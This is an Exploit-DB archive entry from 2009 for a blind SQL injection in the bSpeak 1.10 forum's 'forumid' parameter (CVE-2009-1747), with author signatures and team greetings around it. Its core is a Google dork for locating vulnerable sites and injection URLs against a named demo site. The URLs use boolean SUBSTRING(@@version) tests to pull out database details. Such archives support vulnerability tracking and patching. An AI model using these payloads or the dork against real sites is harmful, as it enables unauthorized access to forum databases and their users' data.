bSpeak 1.10 forumid Remote Blind SQL Injection Vulnerability

2009-05-20T00:00:00
ID EDB-ID:8751
Type exploitdb
Reporter snakespc
Modified 2009-05-20T00:00:00

Description

bSpeak 1.10 (forumid) Remote Blind SQL Injection Vulnerability. CVE-2009-1747. Webapps exploit for php platform

                                        
                                            #-------------------------AllaH AkbaR-------------------------------
#forum bspeak v1.10  Blind SQL Injection Exploit
#-------------------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com
#Site:http://www.snakespc.com/sc/index.php
#Chi3arona houa :  Serra7 merra7 , koulchi mderra7>>>>
#            Aflawa Kamikaz Wa4rin Fi kol Bla4s 
#-------------------------SNAKES TEAM-------------------------------
#
#Script:forum (bspeak v1.10) www.26thavenue.com/index.php
#
#Demo:http://www.26thavenue.com//bspeakdemo/
#
#Dork:"Powered by bSpeak 1.10"
#--------------------------SNAKES TEAM------------------------------
#Exploit:
#--------
#Demo:
#http://www.26thavenue.com/bspeakdemo/forum/index.php?action=post&forumid=3'
#http://www.26thavenue.com/bspeakdemo/forum/index.php?action=post&forumid=3+AND%20SUBSTRING(@@version,1,1)=4 oui :)
#http://www.26thavenue.com/bspeakdemo/forum/index.php?action=post&forumid=3+AND%20SUBSTRING(@@version,1,1)=5 no  :)
#
#-------------------------SNAKES TEAM-------------------------------
#Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: Dr-HTmL
#--------------------------SNAKES TEAM------------------------------
#ALL www.SnakespC.com/sc>>>> (  Members )  >>>>Str0ke >>>>>>>Milw0rm

# milw0rm.com [2009-05-20]